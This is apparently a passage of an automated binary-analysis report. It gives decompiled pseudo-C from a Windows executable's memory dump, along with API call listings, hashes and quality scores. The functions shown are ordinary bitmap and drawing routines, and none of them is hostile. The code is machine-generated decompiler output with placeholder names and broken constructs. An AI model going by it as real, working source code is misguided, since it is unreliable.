                                                                                					_t320 = _t319 - _v36;
                                                                                					_t150 =  *((intOrPtr*)(_v64 + 0x10));
                                                                                					if(_t150 != 3 && _t150 != 0) {
                                                                                						_v60 = E00403584(1);
                                                                                						if(_a4 == 0) {
                                                                                							E00402EC8( &_v174, 0xe);
                                                                                							_v174 = 0x4d42;
                                                                                							_v172 = _v36 + _t320;
                                                                                							_a4 =  &_v174;
                                                                                						}
                                                                                						 *((intOrPtr*)( *_v60 + 0xc))();
                                                                                						 *((intOrPtr*)( *_v60 + 0xc))();
                                                                                						 *((intOrPtr*)( *_v60 + 0xc))();
                                                                                						E004162A0(_v60,  *_v60, _v12, _t316, _t320, _t320, 0);
                                                                                						 *((intOrPtr*)( *_v60 + 0x10))();
                                                                                						_v12 = _v60;
                                                                                					}
                                                                                				} else {
                                                                                					 *((intOrPtr*)( *_v12 + 8))();
                                                                                					_t251 = _v64;
                                                                                					E00402EC8(_t251, 0x28);
                                                                                					_t241 = _t251;
                                                                                					 *(_t241 + 4) = _v72 & 0x0000ffff;
                                                                                					 *(_t241 + 8) = _v70 & 0x0000ffff;
                                                                                					 *((short*)(_t241 + 0xc)) = _v68;
                                                                                					 *((short*)(_t241 + 0xe)) = _v66;
                                                                                					_t320 = _t319 - 0xc;
                                                                                				}
                                                                                				_t245 = _v64;
                                                                                				 *_t245 = _v36;
                                                                                				_v32 = _v28 + _v36;
                                                                                				if( *((short*)(_t245 + 0xc)) != 1) {
                                                                                					E0042009C();
                                                                                				}
                                                                                				if(_v36 == 0x28) {
                                                                                					_t214 =  *(_t245 + 0xe);
                                                                                					if(_t214 == 0x10 || _t214 == 0x20) {
                                                                                						if( *((intOrPtr*)(_t245 + 0x10)) == 3) {
                                                                                							E00416230(_v12, 0xc, _v32);
                                                                                							_v32 = _v32 + 0xc;
                                                                                							_t320 = _t320 - 0xc;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				if( *(_t245 + 0x20) == 0) {
                                                                                					 *(_t245 + 0x20) = E0042032C( *(_t245 + 0xe));
                                                                                				}
                                                                                				_t317 = _v37 & 0x000000ff;
                                                                                				_t257 =  *(_t245 + 0x20) * 0;
                                                                                				E00416230(_v12,  *(_t245 + 0x20) * 0, _v32);
                                                                                				_t321 = _t320 -  *(_t245 + 0x20) * 0;
                                                                                				if( *(_t245 + 0x14) == 0) {
                                                                                					_t297 =  *(_t245 + 0xe) & 0x0000ffff;
                                                                                					_t208 = E0042034C( *((intOrPtr*)(_t245 + 4)), 0x20, _t297);
                                                                                					asm("cdq");
                                                                                					_t257 = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
                                                                                					 *(_t245 + 0x14) = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
                                                                                				}
                                                                                				_t160 =  *(_t245 + 0x14);
                                                                                				if(_t321 > _t160) {
                                                                                					_t321 = _t160;
                                                                                				}
                                                                                				if(_v37 != 0) {
                                                                                					_t160 = E004205F4(_v32);
                                                                                				}
                                                                                				_push(0);
                                                                                				L00406E20();
                                                                                				_v16 = E004201BC(_t160);
                                                                                				_push(_t323);
                                                                                				_push(0x4249bb);
                                                                                				_push( *[fs:edx]);
                                                                                				 *[fs:edx] = _t325;
                                                                                				_t163 =  *((intOrPtr*)(_v64 + 0x10));
                                                                                				if(_t163 == 0 || _t163 == 3) {
                                                                                					if( *0x46b514 == 0) {
                                                                                						_push(0);
                                                                                						_push(0);
                                                                                						_push( &_v24);
                                                                                						_push(0);
                                                                                						_push(_v28);
                                                                                						_t166 = _v16;
                                                                                						_push(_t166);
                                                                                						L00406A60();
                                                                                						_v44 = _t166;
                                                                                						if(_v44 == 0 || _v24 == 0) {
                                                                                							if(GetLastError() != 0) {
                                                                                								E0040B264(_t245, _t257, _t317, _t321);
                                                                                							} else {
                                                                                								E0042009C();
                                                                                							}
                                                                                						}
                                                                                						_push(_t323);
                                                                                						_push( *[fs:eax]);
                                                                                						 *[fs:eax] = _t325;
                                                                                						E00416230(_v12, _t321, _v24);
                                                                                						_pop(_t289);
                                                                                						 *[fs:eax] = _t289;
                                                                                						_t290 = 0x42498a;
                                                                                						 *[fs:eax] = _t290;
                                                                                						_push(0x4249c2);
                                                                                						_t174 = _v16;
                                                                                						_push(_t174);
                                                                                						_push(0);
                                                                                						L00407080();
                                                                                						return _t174;
                                                                                					} else {
                                                                                						goto L27;
                                                                                					}
                                                                                				} else {
                                                                                					L27:
                                                                                					_v20 = 0;
                                                                                					_v24 = E0040272C(_t321);
                                                                                					_push(_t323);
                                                                                					_push(0x424923);
                                                                                					_push( *[fs:edx]);
                                                                                					 *[fs:edx] = _t325;
                                                                                					_t263 = _t321;
                                                                                					E00416230(_v12, _t321, _v24);
                                                                                					_push(_v16);
                                                                                					L00406A58();
                                                                                					_v20 = E004201BC(_v16);
                                                                                					_push(1);
                                                                                					_push(1);
                                                                                					_t183 = _v16;
                                                                                					_push(_t183);
                                                                                					L00406A50();
                                                                                					_v48 = SelectObject(_v20, _t183);
                                                                                					_v56 = 0;
                                                                                					_t188 =  *(_v64 + 0x20);
                                                                                					if(_t188 > 0) {
                                                                                						_t263 = _t188;
                                                                                						_v52 = E004208AC(0, _t188);
                                                                                						_push(0);
                                                                                						_push(_v52);
                                                                                						_t204 = _v20;
                                                                                						_push(_t204);
                                                                                						L00406BD0();
                                                                                						_v56 = _t204;
                                                                                						_push(_v20);
                                                                                						L00406BA0();
                                                                                					}
                                                                                					_push(_t323);
                                                                                					_push(0x4248f7);
                                                                                					_push( *[fs:edx]);
                                                                                					 *[fs:edx] = _t325;
                                                                                					_push(0);
                                                                                					_t189 = _v28;
                                                                                					_push(_t189);
                                                                                					_push(_v24);
                                                                                					_push(4);
                                                                                					_push(_t189);
                                                                                					_t190 = _v20;
                                                                                					_push(_t190);
                                                                                					L00406A68();
                                                                                					_v44 = _t190;
                                                                                					if(_v44 == 0) {
                                                                                						if(GetLastError() != 0) {
                                                                                							E0040B264(_t245, _t263, _t317, _t321);
                                                                                						} else {
                                                                                							E0042009C();
                                                                                						}
                                                                                					}
                                                                                					_pop(_t295);
                                                                                					 *[fs:eax] = _t295;
                                                                                					_push(E004248FE);
                                                                                					if(_v56 != 0) {
                                                                                						_push(0xffffffff);
                                                                                						_push(_v56);
                                                                                						_push(_v20);
                                                                                						L00406BD0();
                                                                                					}
                                                                                					return DeleteObject(SelectObject(_v20, _v48));
                                                                                				}
                                                                                 			}

                                                                                APIs
                                                                                • 72E7AC50.USER32(00000000,?,00000000,00424A6D,?,?), ref: 004247BA
                                                                                • 72E7A590.GDI32(00000001,00000000,00424923,?,00000000,004249BB,?,00000000,?,00000000,00424A6D,?,?), ref: 0042481F
                                                                                • 72E7A520.GDI32(00000001,00000001,00000001,00000001,00000000,00424923,?,00000000,004249BB,?,00000000,?,00000000,00424A6D,?,?), ref: 00424834
                                                                                • SelectObject.GDI32(?,00000000), ref: 0042483E
                                                                                • 72E7B410.GDI32(?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,00424923,?,00000000,004249BB,?,00000000), ref: 0042486E
                                                                                • 72E7B150.GDI32(?,?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,00424923,?,00000000,004249BB), ref: 0042487A
                                                                                • 72E7A7F0.GDI32(?,?,00000004,00000000,?,00000000,00000000,004248F7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0042489E
                                                                                • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,004248F7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 004248AC
                                                                                • 72E7B410.GDI32(?,00000000,000000FF,004248FE,00000000,?,00000000,00000000,004248F7,?,?,00000000,00000001,00000001,00000001,00000001), ref: 004248DE
                                                                                • SelectObject.GDI32(?,?), ref: 004248EB
                                                                                • DeleteObject.GDI32(00000000), ref: 004248F1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Object$B410Select$A520A590B150DeleteErrorLast
                                                                                • String ID: ($0!A$BM
                                                                                • API String ID: 3415089252-1515617234
                                                                                • Opcode ID: 9004de23caba881e76fdc33fc15824efd6e843578893ffe631264b90b5f74ea2
                                                                                • Instruction ID: 460c956ee79e1a374af29936669ac4285e96445d6daf9193b4eb6fa02d8a22bf
                                                                                • Opcode Fuzzy Hash: 9004de23caba881e76fdc33fc15824efd6e843578893ffe631264b90b5f74ea2
                                                                                • Instruction Fuzzy Hash: CED15175B002189FDF04EFA9D885BAEBBF5EF89304F51806AE505E7391D7389840CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 55%
                                                                                			E0046647C(intOrPtr __eax, char __edx) {
                                                                                				intOrPtr _v8;
                                                                                				char _v9;
                                                                                				intOrPtr* _v16;
                                                                                				intOrPtr* _v20;
                                                                                				intOrPtr* _v24;
                                                                                				intOrPtr _v28;
                                                                                				char _v44;
                                                                                				char _v60;
                                                                                				void* __edi;
                                                                                				void* __ebp;
                                                                                				signed int _t170;
                                                                                				signed int _t176;
                                                                                				void* _t209;
                                                                                				void* _t213;
                                                                                				intOrPtr _t218;
                                                                                				intOrPtr _t241;
                                                                                				void* _t254;
                                                                                				void* _t325;
                                                                                				void* _t345;
                                                                                				void* _t361;
                                                                                				void* _t368;
                                                                                				intOrPtr _t382;
                                                                                				intOrPtr _t388;
                                                                                				struct HDC__* _t392;
                                                                                				struct HDC__* _t393;
                                                                                				struct HDC__* _t394;
                                                                                				void* _t421;
                                                                                				void* _t422;
                                                                                				void* _t423;
                                                                                				intOrPtr _t447;
                                                                                				intOrPtr _t464;
                                                                                				void* _t478;
                                                                                				signed int _t486;
                                                                                				void* _t491;
                                                                                				void* _t493;
                                                                                				void* _t495;
                                                                                				intOrPtr _t496;
                                                                                				void* _t506;
                                                                                
                                                                                				_t493 = _t495;
                                                                                				_t496 = _t495 + 0xffffffc8;
                                                                                				_v9 = __edx;
                                                                                				_v8 = __eax;
                                                                                				if(_v9 == 2 &&  *(_v8 + 0x20) < 3) {
                                                                                					_v9 = 0;
                                                                                				}
                                                                                				_t388 =  *((intOrPtr*)(_v8 + 0xc));
                                                                                				if(_t388 != 0xffffffff) {
                                                                                					L24:
                                                                                					return _t388;
                                                                                				} else {
                                                                                					_t170 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x2c))();
                                                                                					if((_t170 |  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x20))()) == 0) {
                                                                                						goto L24;
                                                                                					} else {
                                                                                						_t176 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x2c))();
                                                                                						asm("cdq");
                                                                                						_t486 = _t176 / ( *(_v8 + 0x20) & 0x000000ff);
                                                                                						_t491 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x20))();
                                                                                						if( *((intOrPtr*)(_v8 + 8)) == 0) {
                                                                                							_t503 =  *0x46bc88;
                                                                                							if( *0x46bc88 == 0) {
                                                                                								 *0x46bc88 = E00466170(1);
                                                                                							}
                                                                                							_t382 =  *0x46bc88; // 0x0
                                                                                							 *((intOrPtr*)(_v8 + 8)) = E004661E4(_t382, _t491, _t486);
                                                                                						}
                                                                                						_v16 = E00423960(1);
                                                                                						 *[fs:eax] = _t496;
                                                                                						 *((intOrPtr*)( *_v16 + 0x40))( *[fs:eax], 0x466a2b, _t493);
                                                                                						 *((intOrPtr*)( *_v16 + 0x34))();
                                                                                						E00412984(0, _t486, 0,  &_v44, _t491);
                                                                                						E0041F338( *((intOrPtr*)(E00423F28(_v16) + 0x14)), _t486, 0x8000000f, _t486, _t493, _t503);
                                                                                						E004236F0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x24))());
                                                                                						 *((intOrPtr*)( *_v16 + 0x38))();
                                                                                						if(_v9 >=  *(_v8 + 0x20)) {
                                                                                						}
                                                                                						E00412984(0 * _t486, 1 * _t486, 0,  &_v60, _t491);
                                                                                						_t209 = _v9 - 1;
                                                                                						_t506 = _t209;
                                                                                						if(_t506 < 0) {
                                                                                							L14:
                                                                                							_push( &_v60);
                                                                                							_t213 = E00423F28( *((intOrPtr*)(_v8 + 4)));
                                                                                							E0041F868(E00423F28(_v16),  &_v44, _t507, _t213);
                                                                                							_t218 =  *((intOrPtr*)(_v8 + 4));
                                                                                							_t508 =  *((char*)(_t218 + 0x38)) - 1;
                                                                                							if( *((char*)(_t218 + 0x38)) != 1) {
                                                                                								 *((intOrPtr*)(_v8 + 0xc)) = E00466114( *((intOrPtr*)(_v8 + 8)), 0x20000000, _v16, __eflags);
                                                                                							} else {
                                                                                								 *((intOrPtr*)(_v8 + 0xc)) = E00466114( *((intOrPtr*)(_v8 + 8)),  *((intOrPtr*)(_v8 + 0x1c)), _v16, _t508);
                                                                                							}
                                                                                							goto L23;
                                                                                						} else {
                                                                                							if(_t506 == 0) {
                                                                                								_v24 = 0;
                                                                                								_v20 = 0;
                                                                                								 *[fs:eax] = _t496;
                                                                                								_v24 = E00423960(1);
                                                                                								_v20 = E00423960(1);
                                                                                								 *((intOrPtr*)( *_v20 + 8))( *[fs:eax], 0x4669ef, _t493);
                                                                                								 *((intOrPtr*)( *_v20 + 0x6c))();
                                                                                								_t241 = _v8;
                                                                                								__eflags =  *((char*)(_t241 + 0x20)) - 1;
                                                                                								if( *((char*)(_t241 + 0x20)) <= 1) {
                                                                                									 *((intOrPtr*)( *_v24 + 8))();
                                                                                									 *((intOrPtr*)( *_v24 + 0x6c))();
                                                                                									E0041F338( *((intOrPtr*)(E00423F28(_v24) + 0x14)),  *_v24, 0, _t486, _t493, __eflags);
                                                                                									_t415 =  *_v24;
                                                                                									 *((intOrPtr*)( *_v24 + 0x40))();
                                                                                									_t254 = E00423FE4(_v24);
                                                                                									__eflags = _t254;
                                                                                									if(_t254 != 0) {
                                                                                										E0041EB4C( *((intOrPtr*)(E00423F28(_v24) + 0xc)), 0xffffff);
                                                                                										__eflags = 0;
                                                                                										E00424D78(_v24, 0);
                                                                                										E0041F338( *((intOrPtr*)(E00423F28(_v24) + 0x14)), _t415, 0xffffff, _t486, _t493, __eflags);
                                                                                									}
                                                                                									E00424D78(_v24, 1);
                                                                                									_t391 = E00423F28(_v16);
                                                                                									E0041F338( *((intOrPtr*)(_t258 + 0x14)), _t415, 0x8000000f, _t486, _t493, __eflags);
                                                                                									E0041F9D0(_t258,  &_v44);
                                                                                									E0041F338( *((intOrPtr*)(_t258 + 0x14)), _t415, 0x80000014, _t486, _t493, __eflags);
                                                                                									SetTextColor(E0041FDC4(_t391), 0);
                                                                                									SetBkColor(E0041FDC4(_t391), 0xffffff);
                                                                                									_push(0xe20746);
                                                                                									_push(0);
                                                                                									_push(0);
                                                                                									_push(E0041FDC4(E00423F28(_v24)));
                                                                                									_push(_t491);
                                                                                									_push(_t486);
                                                                                									_push(1);
                                                                                									_push(1);
                                                                                									_push(E0041FDC4(_t391));
                                                                                									L00406A30();
                                                                                									E0041F338( *((intOrPtr*)(_t391 + 0x14)), _t415, 0x80000010, _t486, _t493, __eflags);
                                                                                									SetTextColor(E0041FDC4(_t391), 0);
                                                                                									SetBkColor(E0041FDC4(_t391), 0xffffff);
                                                                                									_push(0xe20746);
                                                                                									_push(0);
                                                                                									_push(0);
                                                                                									_push(E0041FDC4(E00423F28(_v24)));
                                                                                									_push(_t491);
                                                                                									_push(_t486);
                                                                                									_push(0);
                                                                                									_push(0);
                                                                                									_push(E0041FDC4(_t391));
                                                                                									L00406A30();
                                                                                								} else {
                                                                                									_v28 = E00423F28(_v16);
                                                                                									E00423F28(_v20);
                                                                                									E0041F868(_v28,  &_v44, __eflags,  &_v60);
                                                                                									E00424D78(_v24, 1);
                                                                                									 *((intOrPtr*)( *_v24 + 0x40))();
                                                                                									 *((intOrPtr*)( *_v24 + 0x34))();
                                                                                									E0041F338( *((intOrPtr*)(E00423F28(_v20) + 0x14)),  *_v24, 0xffffff, _t486, _t493, __eflags);
                                                                                									_push( &_v60);
                                                                                									_push(E00423F28(_v20));
                                                                                									_t325 = E00423F28(_v24);
                                                                                									_pop(_t421);
                                                                                									E0041F868(_t325,  &_v44, __eflags);
                                                                                									E0041F338( *((intOrPtr*)(_v28 + 0x14)), _t421, 0x80000014, _t486, _t493, __eflags);
                                                                                									_t392 = E0041FDC4(_v28);
                                                                                									SetTextColor(_t392, 0);
                                                                                									SetBkColor(_t392, 0xffffff);
                                                                                									_push(0xe20746);
                                                                                									_push(0);
                                                                                									_push(0);
                                                                                									_push(E0041FDC4(E00423F28(_v24)));
                                                                                									_push(_t491);
                                                                                									_push(_t486);
                                                                                									_push(0);
                                                                                									_push(0);
                                                                                									_push(_t392);
                                                                                									L00406A30();
                                                                                									E0041F338( *((intOrPtr*)(E00423F28(_v20) + 0x14)), _t421, 0x808080, _t486, _t493, __eflags);
                                                                                									_push( &_v60);
                                                                                									_push(E00423F28(_v20));
                                                                                									_t345 = E00423F28(_v24);
                                                                                									_pop(_t422);
                                                                                									E0041F868(_t345,  &_v44, __eflags);
                                                                                									E0041F338( *((intOrPtr*)(_v28 + 0x14)), _t422, 0x80000010, _t486, _t493, __eflags);
                                                                                									_t393 = E0041FDC4(_v28);
                                                                                									SetTextColor(_t393, 0);
                                                                                									SetBkColor(_t393, 0xffffff);
                                                                                									_push(0xe20746);
                                                                                									_push(0);
                                                                                									_push(0);
                                                                                									_push(E0041FDC4(E00423F28(_v24)));
                                                                                									_push(_t491);
                                                                                									_push(_t486);
                                                                                									_push(0);
                                                                                									_push(0);
                                                                                									_push(_t393);
                                                                                									L00406A30();
                                                                                									_push(E0041E68C( *((intOrPtr*)(_v8 + 0x1c))));
                                                                                									_t361 = E00423F28(_v20);
                                                                                									_pop(_t478);
                                                                                									E0041F338( *((intOrPtr*)(_t361 + 0x14)), _t422, _t478, _t486, _t493, __eflags);
                                                                                									_push( &_v60);
                                                                                									_push(E00423F28(_v20));
                                                                                									_t368 = E00423F28(_v24);
                                                                                									_pop(_t423);
                                                                                									E0041F868(_t368,  &_v44, __eflags);
                                                                                									E0041F338( *((intOrPtr*)(_v28 + 0x14)), _t423, 0x8000000f, _t486, _t493, __eflags);
                                                                                									_t394 = E0041FDC4(_v28);
                                                                                									SetTextColor(_t394, 0);
                                                                                									SetBkColor(_t394, 0xffffff);
                                                                                									_push(0xe20746);
                                                                                									_push(0);
                                                                                									_push(0);
                                                                                									_push(E0041FDC4(E00423F28(_v24)));
                                                                                									_push(_t491);
                                                                                									_push(_t486);
                                                                                									_push(0);
                                                                                									_push(0);
                                                                                									_push(_t394);
                                                                                									L00406A30();
                                                                                								}
                                                                                								__eflags = 0;
                                                                                								_pop(_t464);
                                                                                								 *[fs:eax] = _t464;
                                                                                								_push(0x4669f6);
                                                                                								E004035B4(_v20);
                                                                                								return E004035B4(_v24);
                                                                                							} else {
                                                                                								_t507 = _t209 - 0xffffffffffffffff;
                                                                                								if(_t209 - 0xffffffffffffffff < 0) {
                                                                                									goto L14;
                                                                                								}
                                                                                								L23:
                                                                                								_pop(_t447);
                                                                                								 *[fs:eax] = _t447;
                                                                                								_push(0x466a32);
                                                                                								return E004035B4(_v16);
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                			}










































                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • Opcode ID: a9f24f81a7d116526757999156be1767d0915e43dcdf6f836040968d95a88aa2
                                                                                • Instruction ID: b98e89a6adbca2397a49e089f3fa7ccc612caa931b427b032da4384d08e47561
                                                                                • Opcode Fuzzy Hash: a9f24f81a7d116526757999156be1767d0915e43dcdf6f836040968d95a88aa2
                                                                                • Instruction Fuzzy Hash: 0B026070B00214AFC700EFA9D982E9EB7F5EF49315F51446AF801BB392DA78ED458B25
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 71%
                                                                                			E00423C58(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _v8;
                                                                                				void* _v12;
                                                                                				char _v13;
                                                                                				struct tagPOINT _v21;
                                                                                				struct HDC__* _v28;
                                                                                				void* _v32;
                                                                                				intOrPtr _t74;
                                                                                				struct HDC__* _t76;
                                                                                				signed int _t78;
                                                                                				signed int _t79;
                                                                                				char _t80;
                                                                                				void* _t87;
                                                                                				struct HDC__* _t110;
                                                                                				void* _t131;
                                                                                				struct HDC__* _t155;
                                                                                				intOrPtr* _t159;
                                                                                				intOrPtr _t167;
                                                                                				signed int _t168;
                                                                                				intOrPtr _t171;
                                                                                				intOrPtr _t173;
                                                                                				intOrPtr _t175;
                                                                                				int* _t179;
                                                                                				intOrPtr _t181;
                                                                                				void* _t183;
                                                                                				void* _t184;
                                                                                				intOrPtr _t185;
                                                                                
                                                                                				_t160 = __ecx;
                                                                                				_t183 = _t184;
                                                                                				_t185 = _t184 + 0xffffffe4;
                                                                                				_t179 = __ecx;
                                                                                				_v8 = __edx;
                                                                                				_t159 = __eax;
                                                                                				_t181 =  *((intOrPtr*)(__eax + 0x28));
                                                                                				_t167 =  *0x423ea4; // 0xf
                                                                                				E0041FE98(_v8, __ecx, _t167);
                                                                                				E004242C8(_t159);
                                                                                				_v12 = 0;
                                                                                				_v13 = 0;
                                                                                				_t74 =  *((intOrPtr*)(_t181 + 0x10));
                                                                                				if(_t74 != 0) {
                                                                                					_push(0xffffffff);
                                                                                					_push(_t74);
                                                                                					_t155 =  *(_v8 + 4);
                                                                                					_push(_t155);
                                                                                					L00406BD0();
                                                                                					_v12 = _t155;
                                                                                					_push( *(_v8 + 4));
                                                                                					L00406BA0();
                                                                                					_v13 = 1;
                                                                                				}
                                                                                				_push(0xc);
                                                                                				_t76 =  *(_v8 + 4);
                                                                                				_push(_t76);
                                                                                				L00406AF8();
                                                                                				_push(_t76);
                                                                                				_push(0xe);
                                                                                				_t78 =  *(_v8 + 4);
                                                                                				L00406AF8();
                                                                                				_t168 = _t78;
                                                                                				_t79 = _t168 * _t78;
                                                                                				if(_t79 > 8) {
                                                                                					L4:
                                                                                					_t80 = 0;
                                                                                				} else {
                                                                                					_t160 =  *(_t181 + 0x28) & 0x0000ffff;
                                                                                					if(_t79 < ( *(_t181 + 0x2a) & 0x0000ffff) * ( *(_t181 + 0x28) & 0x0000ffff)) {
                                                                                						_t80 = 1;
                                                                                					} else {
                                                                                						goto L4;
                                                                                					}
                                                                                				}
                                                                                				if(_t80 == 0) {
                                                                                					if(E00423FE4(_t159) == 0) {
                                                                                						SetStretchBltMode(E0041FDC4(_v8), 3);
                                                                                					}
                                                                                				} else {
                                                                                					GetBrushOrgEx( *(_v8 + 4),  &_v21);
                                                                                					SetStretchBltMode( *(_v8 + 4), 4);
                                                                                					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
                                                                                				}
                                                                                				_push(_t183);
                                                                                				_push(0x423e95);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t185;
                                                                                				if( *((intOrPtr*)( *_t159 + 0x28))() != 0) {
                                                                                					E00424268(_t159, _t160);
                                                                                				}
                                                                                				_t87 = E00423F28(_t159);
                                                                                				_t171 =  *0x423ea4; // 0xf
                                                                                				E0041FE98(_t87, _t160, _t171);
                                                                                				if( *((intOrPtr*)( *_t159 + 0x28))() == 0) {
                                                                                					StretchBlt( *(_v8 + 4),  *_t179, _t179[1], _t179[2] -  *_t179, _t179[3] - _t179[1],  *(E00423F28(_t159) + 4), 0, 0,  *(_t181 + 0x1c),  *(_t181 + 0x20),  *(_v8 + 0x20));
                                                                                					_pop(_t173);
                                                                                					 *[fs:eax] = _t173;
                                                                                					_push(E00423E9C);
                                                                                					if(_v13 != 0) {
                                                                                						_push(0xffffffff);
                                                                                						_push(_v12);
                                                                                						_t110 =  *(_v8 + 4);
                                                                                						_push(_t110);
                                                                                						L00406BD0();
                                                                                						return _t110;
                                                                                					}
                                                                                					return 0;
                                                                                				} else {
                                                                                					_v32 = 0;
                                                                                					_v28 = 0;
                                                                                					_push(_t183);
                                                                                					_push(0x423e2a);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t185;
                                                                                					L00406A58();
                                                                                					_v28 = E004201BC(0);
                                                                                					_v32 = SelectObject(_v28,  *(_t181 + 0xc));
                                                                                					E00420360( *(_v8 + 4), _t159, _t179[1],  *_t179, _t179, _t181, 0, 0, _v28,  *(_t181 + 0x20),  *(_t181 + 0x1c), 0, 0,  *(E00423F28(_t159) + 4), _t179[3] - _t179[1], _t179[2] -  *_t179);
                                                                                					_t131 = 0;
                                                                                					_t175 = 0;
                                                                                					 *[fs:eax] = _t175;
                                                                                					_push(0x423e6f);
                                                                                					if(_v32 != 0) {
                                                                                						_t131 = SelectObject(_v28, _v32);
                                                                                					}
                                                                                					if(_v28 != 0) {
                                                                                						return DeleteDC(_v28);
                                                                                					}
                                                                                					return _t131;
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                  • Part of subcall function 004242C8: 72E7AC50.USER32(00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 0042431E
                                                                                  • Part of subcall function 004242C8: 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 00424333
                                                                                  • Part of subcall function 004242C8: 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 0042433D
                                                                                  • Part of subcall function 004242C8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 00424361
                                                                                  • Part of subcall function 004242C8: 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 0042436C
                                                                                • 72E7B410.GDI32(?,?,000000FF), ref: 00423C9A
                                                                                • 72E7B150.GDI32(?,?,?,000000FF), ref: 00423CA9
                                                                                • 72E7AD70.GDI32(?,0000000C), ref: 00423CBB
                                                                                • 72E7AD70.GDI32(?,0000000E,00000000,?,0000000C), ref: 00423CCA
                                                                                • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 00423CFE
                                                                                • SetStretchBltMode.GDI32(?,00000004), ref: 00423D0C
                                                                                • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00423D24
                                                                                • SetStretchBltMode.GDI32(00000000,00000003), ref: 00423D41
                                                                                • 72E7A590.GDI32(00000000,00000000,00423E2A,?,?,0000000E,00000000,?,0000000C), ref: 00423DA1
                                                                                • SelectObject.GDI32(?,?), ref: 00423DB6
                                                                                • SelectObject.GDI32(?,00000000), ref: 00423E15
                                                                                • DeleteDC.GDI32(00000000), ref: 00423E24
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: BrushModeObjectSelectStretch$A590B150B380B410CreateDeleteHalftonePalette
                                                                                • String ID:
                                                                                • API String ID: 2051775979-0
                                                                                • Opcode ID: c906eeb68a737587ac24b36a487ec7e1650cf8504f70cfbd4d93897cd3cdeefb
                                                                                • Instruction ID: 930dc268f662767776c74af4ca258a037dfb2cb6be22551be327afb4fc9958b1
                                                                                • Opcode Fuzzy Hash: c906eeb68a737587ac24b36a487ec7e1650cf8504f70cfbd4d93897cd3cdeefb
                                                                                • Instruction Fuzzy Hash: C67148B5B00215AFDB00EFA9D985F5EB7F8AF09304F51856AF508EB281D638EE44CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 51%
